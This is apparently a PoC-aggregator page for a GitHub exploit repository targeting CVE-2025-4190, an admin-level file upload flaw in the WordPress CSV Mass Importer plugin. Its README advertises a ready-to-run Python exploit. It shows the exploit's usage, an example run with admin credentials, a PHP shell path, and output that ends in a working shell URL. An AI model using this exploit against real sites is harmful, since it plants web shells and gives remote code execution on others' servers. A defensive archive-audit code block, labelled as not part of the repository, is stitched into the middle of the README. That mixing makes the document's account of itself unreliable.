POC details: 52726ee7c3dfa6bea90b261314b52ff2cc261222

Source
Related vulnerability
Title: WordPress plugin CSV Mass Importer security vulnerability (CVE-2025-4190)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it supports hosting a personal blog site on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin CSV Mass Importer 1.2 and earlier versions contain a security vulnerability that stems from insufficient validation of uploaded files, which can allow a high-privilege user to upload arbitrary files.
Introduction

# CVE-2025-4190 — WordPress CSV Mass Importer ≤ 1.2 Arbitrary File Upload

![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)  
![CVE](https://img.shields.io/badge/CVE-2025--4190-red)  
![Status](https://img.shields.io/badge/Status-Verified-brightgreen)  
![Author](https://img.shields.io/badge/Author-GadaLuBau_(GadaLuBau1337)-purple)

---

## 📌 Description

The **CSV Mass Importer** plugin (≤ 1.2) for WordPress contains an **Admin+ Arbitrary File Upload** vulnerability.  
Due to improper validation of uploaded files, high-privilege users (such as admin) can upload **arbitrary files** on the server, even when this should be restricted — for example in multisite setups.

This vulnerability allows an attacker to upload PHP shells or malicious files, leading to **remote code execution (RCE)** on the server.

_Discovered by **GadaLuBau (GadaLuBau1337)**._

---

## 🔥 Details

- **Plugin Name:** CSV Mass Importer  
- **Affected Version:** ≤ 1.2  
- **Vulnerability Type:** Admin+ Arbitrary File Upload  
- **CVE:** [CVE-2025-4190](https://wpscan.com/vulnerability/e525ece5-6e03-4aee-bf5b-6ae0b961f027/)  
- **WPVDB ID:** e525ece5-6e03-4aee-bf5b-6ae0b961f027  
- **Original Researcher:** GadaLuBau (GadaLuBau1337)  
- **Submitter Website:** [https://github.com/GadaLuBau1337](https://github.com/GadaLuBau)  
- **Verified:** ✅  

---

## 💻 Proof of Concept (PoC)

The plugin fails to properly check uploaded files when using the CSV import feature.  
A crafted ZIP file containing a PHP shell can be uploaded and extracted to a publicly accessible directory.

**Shell Path Example:**  
```
<target-url>/wp-content/uploads/cmi-data/gadalubau.php
```
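The root cause described above is that archive contents are extracted without validation. As an added defensive illustration (not code from this repository or from the plugin), the audit below applies the checks a safe import feature would run before extracting an uploaded archive: allowed data extensions only, no script extension hidden in a multi-suffix name, no dotfiles, and no path that escapes the extraction directory. The allowed-extension set and the helper names are assumptions.

```python
import io
import posixpath
import zipfile

# Assumption: the import feature only needs CSV data files.
ALLOWED_EXTENSIONS = {"csv"}
# Suffix segments that must never appear anywhere in a name (e.g. 'data.php.csv').
SCRIPT_EXTENSIONS = {"php", "phtml", "php3", "php5", "php7", "phar", "phps"}


def audit_import_archive(zip_bytes: bytes) -> list[str]:
    """Return reasons to reject an uploaded archive before extracting it.

    These are the checks the vulnerable plugin is described as lacking: every
    entry must be a regular file with an allowed data extension, no script
    extension in any suffix, and a path that stays inside the target directory.
    An empty list means every entry passed.
    """
    try:
        archive = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    problems = []
    for info in archive.infolist():
        if info.is_dir():
            continue
        name = info.filename.replace("\\", "/")
        parts = posixpath.normpath(name).split("/")
        if name.startswith("/") or ".." in parts:
            problems.append(f"{info.filename}: path escapes the extraction directory")
            continue
        base = parts[-1]
        suffixes = [s.lower() for s in base.split(".")[1:]]
        if base.startswith(".") or not suffixes:
            problems.append(f"{info.filename}: dotfile or no extension")
        elif suffixes[-1] not in ALLOWED_EXTENSIONS:
            problems.append(f"{info.filename}: extension '.{suffixes[-1]}' not allowed")
        elif SCRIPT_EXTENSIONS & set(suffixes):
            problems.append(f"{info.filename}: script extension hidden in name")
    return problems


def build_sample_archive(entries: dict[str, bytes]) -> bytes:
    """Constructed helper: build an in-memory ZIP from {name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()
```

A non-empty result should abort the import and be logged; on an already-deployed site, any `.php` file under `wp-content/uploads/cmi-data/` is a strong indicator that this check was missing when the upload happened.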

---

## 🚀 Usage

### Script

This repository contains a ready-to-run Python exploit script: `4190.py`

### Help Menu

```bash
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By GadaLuBau (GadaLuBau1337)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target WordPress site URL
  --username, -un USERNAME
                        WordPress admin username
  --password, -p PASSWORD
                        WordPress admin password
```

### Example Run

```bash
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
```

### Expected Output

```
[+] Logged in successfully.
[+] Payload 'gadalubau.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/gadalubau.php
Exploited By GadaLuBau (GadaLuBau1337)
```

---

## 🕰 Timeline

- **Publicly Published:** 15-05-2025  
- **Added to Database:** 15-05-2025  
- **Last Updated:** 15-05-2025  

---

## 🛡 References

- [CVE-2025-4190 on WPScan](https://wpscan.com/vulnerability/e525ece5-6e03-4aee-bf5b-6ae0b961f027/)

---

## ⚠ Disclaimer

This code is provided for **educational purposes** only.  
The author is not responsible for any misuse or damage caused by this script.  
**Use responsibly and only on systems you are authorized to test.**

---

_Discovered and developed by GadaLuBau (GadaLuBau1337)_ 🌟

File snapshot

```
[4.0K] /data/pocs/52726ee7c3dfa6bea90b261314b52ff2cc261222
├── [3.3K] CVE-2025-4190.py
├── [3.2K] README.md
└── [   8] requirements.txt

0 directories, 3 files
```